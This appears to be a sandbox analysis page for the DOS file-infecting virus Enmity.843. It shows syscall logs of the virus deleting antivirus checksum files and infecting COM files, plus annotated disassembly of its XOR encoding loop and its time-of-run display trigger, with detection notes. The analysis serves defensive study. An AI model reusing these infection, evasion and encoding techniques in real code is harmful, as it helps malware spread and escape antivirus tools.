Sample viewer

vx.netlux.org/Virus.DOS.Enmity.843


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:00:39.485902466Z 26 PC: 12a7e | Set disk transfer address
2018-12-17T22:00:39.487881341Z 71 PC: 12a88 | Get current directory
2018-12-17T22:00:39.490767683Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.496386723Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:00:39.502660124Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.50947265Z 65 PC: 12cf6 | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:00:39.519190395Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.530552216Z 65 PC: 12cf6 | Delete file (Filename = 'CHKLIST.CPS')
2018-12-17T22:00:39.539258032Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.54606137Z 65 PC: 12cf6 | Delete file (Filename = 'IVB.NTZ')
2018-12-17T22:00:39.552894282Z 78 PC: 12a90 | Find first file
2018-12-17T22:00:39.559652928Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.575744323Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:00:39.582981294Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.592077188Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.593421643Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.595747191Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-17T22:00:39.599061263Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.602276857Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.611732Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.615483821Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.617174895Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.623758364Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.625766276Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.640231295Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.644912188Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.648018557Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.650979279Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.66078591Z 61 PC: 12bc5 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:00:39.668016592Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.67465672Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.676504187Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.679965036Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-17T22:00:39.683447618Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.686637988Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.694398391Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.698143473Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.700028564Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.706622198Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.708890951Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.717392087Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.722105078Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.727696027Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.738603803Z 61 PC: 12bc5 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:00:39.746663522Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.762368315Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.76393106Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.768697533Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-17T22:00:39.782390564Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.785254782Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.792984381Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.795874279Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.797649225Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.803923357Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.805596566Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.813581675Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.818490193Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.821745415Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.832912838Z 61 PC: 12bc5 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:00:39.839761273Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.846370714Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.8491602Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.851868087Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-17T22:00:39.854283819Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.858363524Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.866497586Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.869437046Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.871979219Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.878690754Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.881253557Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.890820577Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.898519806Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.904336738Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.917056459Z 61 PC: 12bc5 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:00:39.924323334Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.93077513Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.933251935Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.935795552Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-17T22:00:39.938079032Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.942872748Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.951528824Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.954301033Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.956573175Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.963288244Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.965027691Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.9730258Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.978062655Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.980936812Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.990959214Z 61 PC: 12bc5 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:00:39.997905643Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:40.004355452Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:40.006212049Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:40.00895222Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-17T22:00:40.011320719Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:40.020804789Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:40.029080885Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:40.031962542Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:40.033905228Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:40.04112257Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:40.043579762Z 62 PC: 12cbe | Close file
2018-12-17T22:00:40.051795593Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:40.057283363Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:40.060158645Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:40.070025221Z 61 PC: 12bc5 | Open file (Filename = 'PAH.COM')
2018-12-17T22:00:40.077749616Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:40.084760133Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:40.086259376Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:40.089708729Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-17T22:00:40.092278157Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:40.095289841Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:40.104694926Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:40.10754593Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:40.11038179Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:40.118355743Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:40.120054805Z 62 PC: 12cbe | Close file
2018-12-17T22:00:40.129661358Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:40.13522478Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:40.138019285Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:40.149050837Z 61 PC: 12bc5 | Open file (Filename = 'TEST.COM')
2018-12-17T22:00:40.158132425Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:40.165511343Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:40.167224784Z 62 PC: 12cbe | Close file
2018-12-17T22:00:40.175992624Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:40.181694929Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:40.184491844Z 59 PC: 12aa4 | Change current directory
2018-12-17T22:00:40.189610566Z 71 PC: 12ac7 | Get current directory
2018-12-17T22:00:40.193015838Z 59 PC: 12afa | Change current directory
2018-12-17T22:00:40.203178043Z 59 PC: 12b1b | Change current directory
2018-12-17T22:00:40.205908269Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
; Disassembly window printed after a later INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12b1f, on the preceding log row, is `cmp dx, 5`. After Get time,
; DX = seconds (DH) : hundredths (DL), so the branch below skips the display routine
; unless seconds are 0 and hundredths are at most 5 - a narrow time-of-run trigger.
; The routine switches the video mode and prints a zero-terminated string through
; BIOS INT 10h; nothing in this window touches files.
; NOTE(review): INT 10h calls do not appear in the syscall table, so the log alone does
; not show whether this path ran. The run-metadata JSON on this page varies the Second
; field between runs, presumably to exercise this check.
0x12b22: ja 0x12b4c                       ; DX > 5 (unsigned): skip the routine
0x12b24: nop                              ; three NOPs - likely assembler padding after the jump; confirm
0x12b25: nop
0x12b26: nop
0x12b27: mov ax, 0xd                      ; AH=00h set video mode, AL=0Dh (320x200 16-colour graphics)
0x12b2a: int 0x10                         ; BIOS video service
0x12b2c: lea si, word ptr [bp + 0x3c2]    ; SI -> byte string at bp+0x3c2
0x12b30: cld                              ; string ops advance forward
0x12b31: lodsb al, byte ptr [si]          ; AL = next byte of the string
0x12b32: or al, al                        ; set ZF when the byte is zero
0x12b34: je 0x12b43                       ; zero terminator: leave the print loop
0x12b36: nop                              ; padding, as above
0x12b37: nop
0x12b38: nop
0x12b39: mov ah, 0xe                      ; AH=0Eh teletype output of AL
0x12b3b: xor bh, bh                       ; display page 0
0x12b3d: mov bl, 5                        ; foreground colour 5 (used in graphics modes)
0x12b3f: int 0x10                         ; print the character
0x12b41: jmp 0x12b30                      ; next character
2018-12-17T22:00:40.208640207Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1188,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.08826263Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.09528716Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.098611487Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.105105795Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.111431273Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.11783053Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.130411417Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.134305994Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.138683732Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.144697559Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.150698235Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.162476217Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.814895274Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.828552749Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.836380872Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.841097719Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
